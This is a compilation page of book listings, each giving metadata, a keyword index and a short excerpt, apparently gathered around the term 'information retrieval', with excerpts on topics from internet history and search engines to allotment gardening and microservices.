economy, Silicon Valley, Silicon Valley startup, Simon Kuznets, sovereign wealth fund, Stephen Hawking, Steve Ballmer, structural adjustment programs, TaskRabbit, The Chicago School, The Future of Employment, the payments system, The Rise and Fall of American Growth, Thomas Malthus, Thorstein Veblen, too big to fail, Travis Kalanick, Uber and Lyft, Uber for X, uber lyft, Y Combinator, zero-sum game, Zipcar

None of this should occur if there were ‘free markets’ or strong democratic systems that could change the rules. NOTES 1 D. McClintick, ‘How Harvard lost Russia’, Institutional Investor, 27 February 2006. 2 ‘The new age of crony capitalism’, The Economist, 15 March 2014, pp. 9, 53–4; ‘The party winds down’, The Economist, 7 May 2016, pp. 46–8. 3 M. Lupu, K. Mayer, J. Tait and A. J. Trippe (eds), Current Challenges in Patent Information Retrieval (Heidelberg: Springer-Verlag, 2011), p. v. 4 Letter to Isaac McPherson, 13 August 1813. A public good is one that can be consumed or used by one person without affecting its consumption or use by others; it is available to all. 5 ‘A question of utility’, The Economist, 8 August 2015. 6 M. Mazzucato, The Entrepreneurial State: Debunking Public vs Private Sector Myths (London: Anthem Press, 2013). 7 M.


Lessons-Learned-in-Software-Testing-A-Context-Driven-Approach by Anson-QA

anti-pattern, Chuck Templeton: OpenTable:, finite state, framing effect, full employment, information retrieval, job automation, knowledge worker, lateral thinking, Ralph Nader, Richard Feynman, side project, Silicon Valley, statistical model, web application

For example (these examples are all based on successes from our personal experience), imagine bringing in a smart person whose most recent work role was as an attorney who can analyze any specification you can give them and is trained as an advocate, a director of sales and marketing (the one we hired trained our staff in new methods of researching and writing bug reports to draw the attention of the marketing department), a hardware repair technician, a librarian (think about testing databases or other information retrieval systems), a programmer, a project manager (of nonsoftware projects), a technical support representative with experience supporting products like the ones you're testing, a translator (especially useful if your company publishes software in many languages), a secretary (think about all the information that you collect, store, and disseminate and all the time management you and your staff have to do), a system administrator who knows networks, or a user of the software you're testing.


pages: 352 words: 96,532

Where Wizards Stay Up Late: The Origins of the Internet by Katie Hafner, Matthew Lyon

air freight, Bill Duvall, computer age, conceptual framework, Donald Davies, Douglas Engelbart, fault tolerance, Hush-A-Phone, information retrieval, John Markoff, Kevin Kelly, Leonard Kleinrock, Marc Andreessen, Menlo Park, natural language processing, packet switching, RAND corporation, RFC: Request For Comment, Robert Metcalfe, Ronald Reagan, Silicon Valley, speech recognition, Steve Crocker, Steven Levy

The comments appeared in a paper written jointly, using e-mail, with five hundred miles between them. It was “published” electronically in the MsgGroup in 1977. They went on: “As computer communication systems become more powerful, more humane, more forgiving and above all, cheaper, they will become ubiquitous.” Automated hotel reservations, credit checking, real-time financial transactions, access to insurance and medical records, general information retrieval, and real-time inventory control in businesses would all come. In the late 1970s, the Information Processing Techniques Office’s final report to ARPA management on the completion of the ARPANET research program concluded similarly: “The largest single surprise of the ARPANET program has been the incredible popularity and success of network mail. There is little doubt that the techniques of network mail developed in connection with the ARPANET program are going to sweep the country and drastically change the techniques used for intercommunication in the public and private sectors.”


pages: 364 words: 102,926

What the F: What Swearing Reveals About Our Language, Our Brains, and Ourselves by Benjamin K. Bergen

correlation does not imply causation, information retrieval, pre–internet, Ronald Reagan, statistical model, Steven Pinker

Smith, M. (March 3, 2014). Richard Sherman calls NFL banning the N-word “an atrocious idea.” NBC Sports. Retrieved from http://profootballtalk.nbcsports.com/2014/03/03/richard-sherman-calls-nfl-banning-the-n-word-an-atrocious-idea. Snopes. (October 11, 2014). Pluck Yew. Retrieved from http://www.snopes.com/language/apocryph/pluckyew.asp. Social Security Administration. (n.d.). Background information. Retrieved from https://www.ssa.gov/oact/babynames/background.html. Songbass. (November 3, 2008). Obama gives McCain the middle finger. YouTube. Retrieved from https://www.youtube.com/watch?v=Pc8Wc1CN7sY. Spears, A. K. (1998). African-American language use: Ideology and so-called obscenity. In African-American English: Structure, history, and use, Salikoko S. Mufwene (Ed.), 226–250. New York: Routledge.


Your Own Allotment : How to Find It, Cultivate It, and Enjoy Growing Your Own Food by Russell-Jones, Neil.

Berlin Wall, British Empire, carbon footprint, Corn Laws, David Attenborough, discovery of the americas, information retrieval, Kickstarter, mass immigration, spice trade

YOUR OWN ALLOTMENT If you want to know how… How to Grow Your Own Food A week-by-week guide to wild life friendly fruit and vegetable gardening Planning and Creating Your First Garden A step-by-step guide to designing your garden – whatever your experience or knowledge How to Start Your Own Gardening Business An insider guide to setting yourself up as a professional gardener Please send for a free copy of the latest catalogue: How To Books Ltd Spring Hill House, Spring Hill Road, Begbroke Oxford OX5 1RX, United Kingdom info@howtobooks.co.uk www.howtobooks.co.uk YOUR OWN ALLOTMENT How to find it, cultivate it, and enjoy growing your own food Neil Russell-Jones SPRING HILL Published by How To Content, A division of How To Books Ltd, Spring Hill House, Spring Hill Road, Begbroke, Oxford OX5 1RX, United Kingdom. Tel: (01865) 375794. Fax: (01865) 379162. info@howtobooks.co.uk www.howtobooks.co.uk All rights reserved. No part of this work may be reproduced or stored in an information retrieval system (other than for purposes of review), without the express permission of the publisher in writing. The right of Neil Russell-Jones to be identified as author of this work has been asserted by him in accordance with the Copyright, Designs and Patents Act 1988. 
© 2008 Neil Russell-Jones First edition 2008 First published in electronic form 2008 British Library Cataloguing in Publication Data A catalogue record for this book is available from the British Library ISBN 978 1 84803 247 7 Cover design by Mousemat Design Illustrations by Deborah Andrews Produced for How To Books by Deer Park Productions, Tavistock, Devon Typeset by Pantek Arts Ltd, Maidstone, Kent NOTE:The material contained in this book is set out in good faith for general guidance and no liability can be accepted for loss or expense incurred as a result of relying in particular circumstances on statements made in this book.The laws and regulations are complex and liable to change, and readers should check the current positions with the relevant authorities before making personal arrangements.


pages: 519 words: 102,669

Programming Collective Intelligence by Toby Segaran

always be closing, correlation coefficient, Debian, en.wikipedia.org, Firefox, full text search, information retrieval, PageRank, prediction markets, recommendation engine, slashdot, Thomas Bayes, web application

Searching and Ranking This chapter covers full-text search engines, which allow people to search a large set of documents for a list of words, and which rank results according to how relevant the documents are to those words. Algorithms for full-text searches are among the most important collective intelligence algorithms, and many fortunes have been made by new ideas in this field. It is widely believed that Google's rapid rise from an academic project to the world's most popular search engine was based largely on the PageRank algorithm, a variation that you'll learn about in this chapter. Information retrieval is a huge field with a long history. This chapter will only be able to cover a few key concepts, but we'll go through the construction of a search engine that will index a set of documents and leave you with ideas on how to improve things further. Although the focus will be on algorithms for searching and ranking rather than on the infrastructure requirements for indexing large portions of the Web, the search engine you build should have no problem with collections of up to 100,000 pages.
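The pipeline the excerpt describes — index a set of documents, then rank matches by relevance — can be sketched in a few lines. This toy is an illustration only, not the book's actual code: it builds an inverted index and scores results by raw term frequency; PageRank and smarter term weighting are refinements on the same skeleton:

```python
from collections import defaultdict

def build_index(docs):
    """Inverted index: word -> {doc_id: occurrence count}."""
    index = defaultdict(lambda: defaultdict(int))
    for doc_id, text in docs.items():
        for word in text.lower().split():
            index[word][doc_id] += 1
    return index

def search(index, query):
    """Rank documents by summed term frequency over the query words."""
    scores = defaultdict(int)
    for word in query.lower().split():
        for doc_id, count in index.get(word, {}).items():
            scores[doc_id] += count
    return sorted(scores, key=scores.get, reverse=True)

docs = {
    1: "full text search engines rank documents",
    2: "search engines build a search index over documents",
    3: "collective intelligence algorithms",
}
index = build_index(docs)
print(search(index, "search documents"))  # → [2, 1]
```

Document 2 wins because it contains "search" twice; a real engine would also normalize for document length and fold in link-based scores such as PageRank.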


pages: 416 words: 106,582

This Will Make You Smarter: 150 New Scientific Concepts to Improve Your Thinking by John Brockman

23andMe, Albert Einstein, Alfred Russel Wallace, banking crisis, Barry Marshall: ulcers, Benoit Mandelbrot, Berlin Wall, biofilm, Black Swan, butterfly effect, Cass Sunstein, cloud computing, congestion charging, correlation does not imply causation, Daniel Kahneman / Amos Tversky, dark matter, data acquisition, David Brooks, delayed gratification, Emanuel Derman, epigenetics, Exxon Valdez, Flash crash, Flynn Effect, hive mind, impulse control, information retrieval, Intergovernmental Panel on Climate Change (IPCC), Isaac Newton, Jaron Lanier, Johannes Kepler, John von Neumann, Kevin Kelly, lifelogging, mandelbrot fractal, market design, Mars Rover, Marshall McLuhan, microbiome, Murray Gell-Mann, Nicholas Carr, open economy, Pierre-Simon Laplace, place-making, placebo effect, pre–internet, QWERTY keyboard, random walk, randomized controlled trial, rent control, Richard Feynman, Richard Feynman: Challenger O-ring, Richard Thaler, Satyajit Das, Schrödinger's Cat, security theater, selection bias, Silicon Valley, Stanford marshmallow experiment, stem cell, Steve Jobs, Steven Pinker, Stewart Brand, the scientific method, Thorstein Veblen, Turing complete, Turing machine, twin studies, Vilfredo Pareto, Walter Mischel, Whole Earth Catalog, WikiLeaks, zero-sum game

Although some have written about information overload, data smog, and the like, my view has always been the more information online the better, as long as good search tools are available. Sometimes this information is found by directed search using a Web search engine, sometimes by serendipity by following links, and sometimes by asking hundreds of people in your social network or hundreds of thousands of people on a question-answering Web site such as Answers.com, Quora, or Yahoo Answers. I do not actually know of a real findability index, but tools in the field of information retrieval could be applied to develop one. One of the unsolved problems in the field is how to help the searcher to determine if the information simply is not available. An Assertion Is Often an Empirical Question, Settled by Collecting Evidence Susan Fiske Eugene Higgins Professor of Psychology, Princeton University; author, Envy Up, Scorn Down: How Status Divides Us The most important scientific concept is that an assertion is often an empirical question, settled by collecting evidence.


pages: 540 words: 103,101

Building Microservices by Sam Newman

airport security, Amazon Web Services, anti-pattern, business process, call centre, continuous integration, create, read, update, delete, defense in depth, don't repeat yourself, Edward Snowden, fault tolerance, index card, information retrieval, Infrastructure as a Service, inventory management, job automation, Kubernetes, load shedding, loose coupling, microservices, MITM: man-in-the-middle, platform as a service, premature optimization, pull request, recommendation engine, social graph, software as a service, source of truth, the built environment, web application, WebSocket

The benefit here is that if we use existing software for this purpose, someone has done much of the hard work for us. However, we still need to know how to set up and maintain these systems in a resilient fashion. Starting Again The architecture that gets you started may not be the architecture that keeps you going when your system has to handle very different volumes of load. As Jeff Dean said in his presentation “Challenges in Building Large-Scale Information Retrieval Systems” (WSDM 2009 conference), you should “design for ~10× growth, but plan to rewrite before ~100×.” At certain points, you need to do something pretty radical to support the next level of growth. Recall the story of Gilt, which we touched on in Chapter 6. A simple monolithic Rails application did well for Gilt for two years. Its business became increasingly successful, which meant more customers and more load.


pages: 433 words: 106,048

The End of Illness by David B. Agus

Danny Hillis, discovery of penicillin, double helix, epigenetics, germ theory of disease, Google Earth, impulse control, information retrieval, longitudinal study, meta analysis, meta-analysis, microbiome, Murray Gell-Mann, pattern recognition, Pepto Bismol, personalized medicine, randomized controlled trial, risk tolerance, Steve Jobs, the scientific method

The poll also found that 68 percent of those who have access have used the Internet to look for information about specific medicines, and nearly four in ten use it to look for other patients’ experiences of a condition. Without a doubt new technologies are helping more people around the world to find out more about their health and to make better-informed decisions, but often their online searches lack usefulness because the information retrieved cannot be personalized. Relying on dodgy information can easily lead people to take risks with inappropriate tests and treatments, wasting money and causing unnecessary worry. But with a health-record system like Dell’s and its developing infrastructure to tailor health advice and guidance to individual people based on their personal records, the outcome could be revolutionary to our health-care system, instigating the reform that’s sorely needed.


pages: 461 words: 106,027

Zero to Sold: How to Start, Run, and Sell a Bootstrapped Business by Arvid Kahl

"side hustle", business process, centre right, Chuck Templeton: OpenTable:, continuous integration, coronavirus, COVID-19, Covid-19, crowdsourcing, domain-specific language, financial independence, Google Chrome, if you build it, they will come, information asymmetry, information retrieval, inventory management, Jeff Bezos, job automation, Kubernetes, minimum viable product, Network effects, performance metric, post-work, premature optimization, risk tolerance, Ruby on Rails, sentiment analysis, Silicon Valley, software as a service, source of truth, statistical model, subscription business, supply-chain management, trickle-down economics, web application

You will need to guide them to the information they seek, because the entire due diligence process is a trust-building exercise, and your involvement in building the relationship in this process will set the tone for years to come. Start by explaining your documents and what they contain in an overview document. Provide a master document that gives your buyer quick access to the data they're looking for at a glance. If you're storing all of your documents in cloud storage like Google Drive, you can cross-link between documents easily. Anything you can do to speed up information retrieval will make the due diligence process less stressful. While the due diligence phase usually comes with certain legal guarantees, don't be naive: there will be bad actors in the field, and some people will just promise more than they're willing to do. While most buyers are serious, some may just want to take a look under the hood of your business. For that reason, I recommend staging the release of information, starting with the least sensitive (like an accurate yet not too detailed P&L sheet), and keeping the most critical information (like your internal roadmap documents) until the very end.


The Dream Machine: J.C.R. Licklider and the Revolution That Made Computing Personal by M. Mitchell Waldrop

Ada Lovelace, air freight, Alan Turing: On Computable Numbers, with an Application to the Entscheidungsproblem, Albert Einstein, anti-communist, Apple II, battle of ideas, Berlin Wall, Bill Duvall, Bill Gates: Altair 8800, Byte Shop, Claude Shannon: information theory, computer age, conceptual framework, cuban missile crisis, Donald Davies, double helix, Douglas Engelbart, Douglas Engelbart, Dynabook, experimental subject, fault tolerance, Frederick Winslow Taylor, friendly fire, From Mathematics to the Technologies of Life and Death, Haight Ashbury, Howard Rheingold, information retrieval, invisible hand, Isaac Newton, James Watt: steam engine, Jeff Rulifson, John von Neumann, Leonard Kleinrock, Marc Andreessen, Menlo Park, New Journalism, Norbert Wiener, packet switching, pink-collar, popular electronics, RAND corporation, RFC: Request For Comment, Robert Metcalfe, Silicon Valley, Steve Crocker, Steve Jobs, Steve Wozniak, Steven Levy, Stewart Brand, Ted Nelson, Turing machine, Turing test, Vannevar Bush, Von Neumann architecture, Wiener process, zero-sum game

I first tried to find close relevance within established disciplines [such as artificial intelligence,] but in each case I found that the people I would talk with would immediately translate my admittedly strange (for the times) statements of purpose and possibility into their own discipline's framework."9 At the 1960 meeting of the American Documentation Institute, a talk he gave was greeted with yawns, and his proposed augmentation environment was dismissed as just another information-retrieval system. No, Engelbart realized, if his augmentation ideas were ever going to fly, he would have to create a new discipline from scratch. And to do that, he would have to give this new discipline a conceptual framework all its own, a manifesto that would lay out his thinking in the most compelling way possible. Creating that manifesto took him the better part of two years. "Augmenting the Human Intellect: A Conceptual Framework" wouldn't be completed until October 1962.

No, he didn't-though, as is so often the case with Bob Taylor, the reasons were more complex than they seemed on the surface. To begin with, while he very much liked the idea of having a big influence on PARC's research, he considered Pake's notion of a "graphics research group" a complete nonstarter. Sure, graphics technology was a critical part of this what- ever-it-was he wanted to create. But so were text display, mass-storage technol- ogy, networking technology, information retrieval, and all the rest. Taylor wanted to go after the whole, integrated vision, just as he'd gone after the whole Intergalactic Network. To focus entirely on graphics would be like trying to build the Arpanet by focusing entirely on the technology of telephone lines. And yet Pake did have a point, damn it. At age thirty-eight Taylor had spent his entire adult career funding computer research, but he had never actually done LIVING IN THE FUTURE 345 computer research.


pages: 470 words: 109,589

Apache Solr 3 Enterprise Search Server by Unknown

bioinformatics, continuous integration, database schema, en.wikipedia.org, fault tolerance, Firefox, full text search, information retrieval, natural language processing, performance metric, platform as a service, Ruby on Rails, web application

The major features found in Lucene are: An inverted index for efficient retrieval of documents by indexed terms. The same technology supports numeric data with range queries too. A rich set of chainable text analysis components, such as tokenizers and language-specific stemmers that transform a text string into a series of terms (words). A query syntax with a parser and a variety of query types, from a simple term lookup to exotic fuzzy matching. A good scoring algorithm based on sound Information Retrieval (IR) principles to produce the most likely candidates first, with flexible means to affect the scoring. Search-enhancing features like: a highlighter feature to show query words found in context; a query spellchecker based on indexed content or a supplied dictionary; and a "more like this" feature to list documents that are statistically similar to provided text. To learn more about Lucene, read Lucene In Action, 2nd Edition by Michael McCandless, Erik Hatcher, and Otis Gospodnetić.
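The inverted index Lucene is built on can be sketched in a few lines. This is a toy illustration of the data structure, not Lucene's actual implementation: a real engine also stores term positions and frequencies so its scoring algorithm can rank the candidates.

```python
from collections import defaultdict

# Toy inverted index: maps each term to the set of document IDs containing it.
def build_index(docs):
    index = defaultdict(set)
    for doc_id, text in docs.items():
        for term in text.lower().split():  # a real analyzer would also stem, etc.
            index[term].add(doc_id)
    return index

def search(index, query):
    """AND query: intersect the posting sets of all query terms."""
    postings = [index.get(term, set()) for term in query.lower().split()]
    return set.intersection(*postings) if postings else set()

docs = {1: "full text search", 2: "text retrieval systems", 3: "search engines"}
index = build_index(docs)
print(search(index, "text search"))  # {1}
```

The payoff is that query time depends on posting-list sizes rather than on scanning every document, which is why the same structure scales from this toy to full-text engines.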


pages: 396 words: 117,149

The Master Algorithm: How the Quest for the Ultimate Learning Machine Will Remake Our World by Pedro Domingos

Albert Einstein, Amazon Mechanical Turk, Arthur Eddington, basic income, Bayesian statistics, Benoit Mandelbrot, bioinformatics, Black Swan, Brownian motion, cellular automata, Claude Shannon: information theory, combinatorial explosion, computer vision, constrained optimization, correlation does not imply causation, creative destruction, crowdsourcing, Danny Hillis, data is the new oil, double helix, Douglas Hofstadter, Erik Brynjolfsson, experimental subject, Filter Bubble, future of work, global village, Google Glasses, Gödel, Escher, Bach, information retrieval, job automation, John Markoff, John Snow's cholera map, John von Neumann, Joseph Schumpeter, Kevin Kelly, lone genius, mandelbrot fractal, Mark Zuckerberg, Moneyball by Michael Lewis explains big data, Narrative Science, Nate Silver, natural language processing, Netflix Prize, Network effects, NP-complete, off grid, P = NP, PageRank, pattern recognition, phenotype, planetary scale, pre–internet, random walk, Ray Kurzweil, recommendation engine, Richard Feynman, scientific worldview, Second Machine Age, self-driving car, Silicon Valley, social intelligence, speech recognition, Stanford marshmallow experiment, statistical model, Stephen Hawking, Steven Levy, Steven Pinker, superintelligent machines, the scientific method, The Signal and the Noise by Nate Silver, theory of mind, Thomas Bayes, transaction costs, Turing machine, Turing test, Vernor Vinge, Watson beat the top human players on Jeopardy!, white flight, zero-sum game

Milton Friedman argues for oversimplified theories in “The methodology of positive economics,” which appears in Essays in Positive Economics (University of Chicago Press, 1966). The use of Naïve Bayes in spam filtering is described in “Stopping spam,” by Joshua Goodman, David Heckerman, and Robert Rounthwaite (Scientific American, 2005). “Relevance weighting of search terms,”* by Stephen Robertson and Karen Sparck Jones (Journal of the American Society for Information Science, 1976), explains the use of Naïve Bayes–like methods in information retrieval. “First links in the Markov chain,” by Brian Hayes (American Scientist, 2013), recounts Markov’s invention of the eponymous chains. “Large language models in machine translation,”* by Thorsten Brants et al. (Proceedings of the 2007 Joint Conference on Empirical Methods in Natural Language Processing and Computational Natural Language Learning, 2007), explains how Google Translate works.


pages: 365 words: 117,713

The Selfish Gene by Richard Dawkins

double helix, information retrieval, lateral thinking, Necker cube, pattern recognition, phenotype, prisoner's dilemma, zero-sum game

A notable advance was the evolutionary 'invention' of memory. By this device, the timing of muscle contractions could be influenced not only by events in the immediate past, but by events in the distant past as well. The memory, or store, is an essential part of a digital computer too. Computer memories are more reliable than human ones, but they are less capacious, and enormously less sophisticated in their techniques of information-retrieval. One of the most striking properties of survival-machine behaviour is its apparent purposiveness. By this I do not just mean that it seems to be well calculated to help the animal's genes to survive, although of course it is. I am talking about a closer analogy to human purposeful behaviour. When we watch an animal 'searching' for food, or for a mate, or for a lost child, we can hardly help imputing to it some of the subjective feelings we ourselves experience when we search.


pages: 397 words: 110,130

Smarter Than You Think: How Technology Is Changing Our Minds for the Better by Clive Thompson

4chan, A Declaration of the Independence of Cyberspace, augmented reality, barriers to entry, Benjamin Mako Hill, butterfly effect, citizen journalism, Claude Shannon: information theory, conceptual framework, corporate governance, crowdsourcing, Deng Xiaoping, discovery of penicillin, disruptive innovation, Douglas Engelbart, Douglas Engelbart, drone strike, Edward Glaeser, Edward Thorp, en.wikipedia.org, experimental subject, Filter Bubble, Freestyle chess, Galaxy Zoo, Google Earth, Google Glasses, Gunnar Myrdal, Henri Poincaré, hindsight bias, hive mind, Howard Rheingold, information retrieval, iterative process, jimmy wales, Kevin Kelly, Khan Academy, knowledge worker, lifelogging, Mark Zuckerberg, Marshall McLuhan, Menlo Park, Netflix Prize, Nicholas Carr, Panopticon Jeremy Bentham, patent troll, pattern recognition, pre–internet, Richard Feynman, Ronald Coase, Ronald Reagan, Rubik’s Cube, sentiment analysis, Silicon Valley, Skype, Snapchat, Socratic dialogue, spaced repetition, superconnector, telepresence, telepresence robot, The Nature of the Firm, the scientific method, The Wisdom of Crowds, theory of mind, transaction costs, Vannevar Bush, Watson beat the top human players on Jeopardy!, WikiLeaks, X Prize, éminence grise

the Wikipedia page on “Drone attacks in Pakistan”: “Drone attacks in Pakistan,” Wikipedia, accessed March 24, 2013, en.wikipedia.org/wiki/Drone_attacks_in_Pakistan. 40 percent of all queries are acts of remembering: Jaime Teevan, Eytan Adar, Rosie Jones, and Michael A. S. Potts, “Information Re-Retrieval: Repeat Queries in Yahoo’s Logs,” in SIGIR ’07: Proceedings of the 30th Annual International ACM SIGIR Conference on Research and Development in Information Retrieval (2007), 151–58. collaborative inhibition: Celia B. Harris, Paul G. Keil, John Sutton, and Amanda J. Barnier, “We Remember, We Forget: Collaborative Remembering in Older Couples,” Discourse Processes 48, no. 4 (2011), 267–303. In his essay “Mathematical Creation”: Henri Poincaré, “Mathematical Creation,” in The Anatomy of Memory: An Anthology (New York: Oxford University Press, 1996), 126–35.


pages: 437 words: 113,173

Age of Discovery: Navigating the Risks and Rewards of Our New Renaissance by Ian Goldin, Chris Kutarna

2013 Report for America's Infrastructure - American Society of Civil Engineers - 19 March 2013, 3D printing, Airbnb, Albert Einstein, AltaVista, Asian financial crisis, asset-backed security, autonomous vehicles, banking crisis, barriers to entry, battle of ideas, Berlin Wall, bioinformatics, bitcoin, Bonfire of the Vanities, clean water, collective bargaining, Colonization of Mars, Credit Default Swap, crowdsourcing, cryptocurrency, Dava Sobel, demographic dividend, Deng Xiaoping, Doha Development Round, double helix, Edward Snowden, Elon Musk, en.wikipedia.org, epigenetics, experimental economics, failed state, Fall of the Berlin Wall, financial innovation, full employment, Galaxy Zoo, global pandemic, global supply chain, Hyperloop, immigration reform, income inequality, indoor plumbing, industrial cluster, industrial robot, information retrieval, Intergovernmental Panel on Climate Change (IPCC), intermodal, Internet of things, invention of the printing press, Isaac Newton, Islamic Golden Age, Johannes Kepler, Khan Academy, Kickstarter, low cost airline, low cost carrier, low skilled workers, Lyft, Malacca Straits, mass immigration, megacity, Mikhail Gorbachev, moral hazard, Nelson Mandela, Network effects, New Urbanism, non-tariff barriers, Occupy movement, On the Revolutions of the Heavenly Spheres, open economy, Panamax, Pearl River Delta, personalized medicine, Peter Thiel, post-Panamax, profit motive, rent-seeking, reshoring, Robert Gordon, Robert Metcalfe, Search for Extraterrestrial Intelligence, Second Machine Age, self-driving car, Shenzhen was a fishing village, Silicon Valley, Silicon Valley startup, Skype, smart grid, Snapchat, special economic zone, spice trade, statistical model, Stephen Hawking, Steve Jobs, Stuxnet, The Future of Employment, too big to fail, trade liberalization, trade route, transaction costs, transatlantic slave trade, uber lyft, undersea cable, uranium enrichment, We are the 99%, We wanted flying cars, instead we got 140 
characters, working poor, working-age population, zero day

Goldin, Ian, ed. (2014). Is the Planet Full? Oxford: Oxford University Press. 48. Goldin, Ian and Kenneth Reinert (2012). Globalization for Development. Oxford: Oxford University Press. 49. Vietnam Food Association (2014). “Yearly Export Statistics.” Retrieved from vietfood.org.vn/en/default.aspx?c=108. 50. Bangladesh Garment Manufacturers and Exporters Association (2015). “Trade Information.” Retrieved from bgmea.com.bd/home/pages/TradeInformation#.U57MMhZLGYU. 51. Burke, Jason (2013, November 14). “Bangladesh Garment Workers Set for 77% Pay Rise.” The Guardian. Retrieved from www.theguardian.com. 52. Goldin, Ian and Kenneth Reinert (2012). Globalization for Development. Oxford: Oxford University Press. 53. Industrial Development Bureau (2015). “Industry Introduction—History of Industrial Development.”


pages: 523 words: 112,185

Doing Data Science: Straight Talk From the Frontline by Cathy O'Neil, Rachel Schutt

Amazon Mechanical Turk, augmented reality, Augustin-Louis Cauchy, barriers to entry, Bayesian statistics, bioinformatics, computer vision, correlation does not imply causation, crowdsourcing, distributed generation, Edward Snowden, Emanuel Derman, fault tolerance, Filter Bubble, finite state, Firefox, game design, Google Glasses, index card, information retrieval, iterative process, John Harrison: Longitude, Khan Academy, Kickstarter, Mars Rover, Nate Silver, natural language processing, Netflix Prize, p-value, pattern recognition, performance metric, personalized medicine, pull request, recommendation engine, rent-seeking, selection bias, Silicon Valley, speech recognition, statistical model, stochastic process, text mining, the scientific method, The Wisdom of Crowds, Watson beat the top human players on Jeopardy!, X Prize

There is also the false positive rate and the false negative rate, and these don't get other special names. Another evaluation metric you could use is precision, defined in Chapter 5. Some of the same formulas have different names because different academic disciplines developed these ideas separately. So precision and recall are the quantities used in the field of information retrieval. Note that precision is not the same thing as specificity. Finally, we have accuracy, which is the ratio of the number of correct labels to the total number of labels, and the misclassification rate, which is just 1 - accuracy. Minimizing the misclassification rate then just amounts to maximizing accuracy. Putting it all together Now that you have a distance measure and an evaluation metric, you're ready to roll.
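The metrics above all fall out of the four confusion-matrix counts. A short sketch with made-up labels (the data here is illustrative, not from the book):

```python
# Derive precision, recall, accuracy, and misclassification rate
# from true/predicted binary labels (illustrative values).
def confusion_counts(y_true, y_pred):
    tp = sum(t == 1 and p == 1 for t, p in zip(y_true, y_pred))
    fp = sum(t == 0 and p == 1 for t, p in zip(y_true, y_pred))
    fn = sum(t == 1 and p == 0 for t, p in zip(y_true, y_pred))
    tn = sum(t == 0 and p == 0 for t, p in zip(y_true, y_pred))
    return tp, fp, fn, tn

y_true = [1, 1, 0, 0, 1, 0]
y_pred = [1, 0, 0, 1, 1, 0]
tp, fp, fn, tn = confusion_counts(y_true, y_pred)

precision = tp / (tp + fp)            # of everything labeled positive, how much was right
recall    = tp / (tp + fn)            # of all true positives, how many were found
accuracy  = (tp + tn) / len(y_true)   # fraction of correct labels overall
misclassification = 1 - accuracy
```

Specificity, by contrast, would be tn / (tn + fp), which makes concrete why it is not the same thing as precision.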


pages: 436 words: 124,373

Galactic North by Alastair Reynolds

back-to-the-land, Buckminster Fuller, hive mind, information retrieval, Kickstarter, risk/return, stem cell, trade route

"Disclose all our confidential practices while you're at it, Mirsky," Seven said. She glared at him through her visor. "Veda would have figured it out." "We'll never know now, will we?" "What does it matter?" she said. "Gonna kill them anyway, aren't you?" Seven flashed an arc of teeth filed to points and waved a hand towards the female pirate. "Allow me to introduce Mirsky, our loose-tongued but efficient information retrieval specialist. She's going to take you on a little trip down memory lane; see if we can't remember those access codes." "What codes?" "It'll come back to you," Seven said. They were taken through the tunnels, past half-assembled mining machines, onto the surface and then into the pirate ship. The ship was huge: most of it living space. Cramped corridors snaked through hydroponics galleries of spring wheat and dwarf papaya, strung with xenon lights.


pages: 597 words: 119,204

Website Optimization by Andrew B. King

AltaVista, bounce rate, don't be evil, en.wikipedia.org, Firefox, In Cold Blood by Truman Capote, information retrieval, iterative process, Kickstarter, medical malpractice, Network effects, performance metric, search engine result page, second-price auction, second-price sealed-bid, semantic web, Silicon Valley, slashdot, social graph, Steve Jobs, web application

If all you have is the total page download time, or even large "buckets" of time (like content download versus network), you won't be able to improve performance. This is especially true in the more complex world of the Web where application calls are hidden within the content portion of the page and third parties are critical to the overall download time. You need to have a view into every piece of the page load in order to manage and improve it. * * * [167] Roast, C. 1998. "Designing for Delay in Interactive Information Retrieval." Interacting with Computers 10 (1): 87–104. [168] Balashov, K., and A. King. 2003. "Compressing the Web." In Speed Up Your Site: Web Site Optimization. Indianapolis: New Riders, 412. A test of 25 popular sites found that HTTP gzip compression saved 75% on average off text file sizes and 37% overall. [169] Bent, L. et al. 2004. "Characterization of a large web site population with implications for content delivery."


pages: 570 words: 115,722

The Tangled Web: A Guide to Securing Modern Web Applications by Michal Zalewski

barriers to entry, business process, defense in depth, easy for humans, difficult for computers, fault tolerance, finite state, Firefox, Google Chrome, information retrieval, RFC: Request For Comment, semantic web, Steve Jobs, telemarketer, Turing test, Vannevar Bush, web application, WebRTC, WebSocket

The subsequent proposals experimented with an increasingly bizarre set of methods to permit interactions other than retrieving a document or running a script, including such curiosities as SHOWMETHOD, CHECKOUT, or—why not—SPACEJUMP.[122] Most of these thought experiments have been abandoned in HTTP/1.1, which settles on a more manageable set of eight methods. Only the first two request types—GET and POST—are of any significance to most of the modern Web. GET The GET method is meant to signify information retrieval. In practice, it is used for almost all client-server interactions in the course of a normal browsing session. Regular GET requests carry no browser-supplied payloads, although they are not strictly prohibited from doing so. The expectation is that GET requests should not have, to quote the RFC, “significance of taking an action other than retrieval” (that is, they should make no persistent changes to the state of the application).
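On the wire, a GET request is just a short plain-text message: a request line naming the method and path, a few headers, and then a blank line with no payload, matching the "retrieval only" semantics described above. A minimal sketch that builds the raw text (the host and path are hypothetical):

```python
# Construct the raw text of an HTTP/1.1 GET request.
# Note there is no body: the message ends at the blank line after the headers.
def build_get(host, path):
    return (f"GET {path} HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            f"Connection: close\r\n"
            f"\r\n")

request = build_get("example.com", "/index.html")
print(request.splitlines()[0])  # GET /index.html HTTP/1.1
```

A POST differs precisely in what is absent here: it would add Content-Length and Content-Type headers and carry a payload after the blank line, which is why it, and not GET, is expected to change application state.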


pages: 320 words: 87,853

The Black Box Society: The Secret Algorithms That Control Money and Information by Frank Pasquale

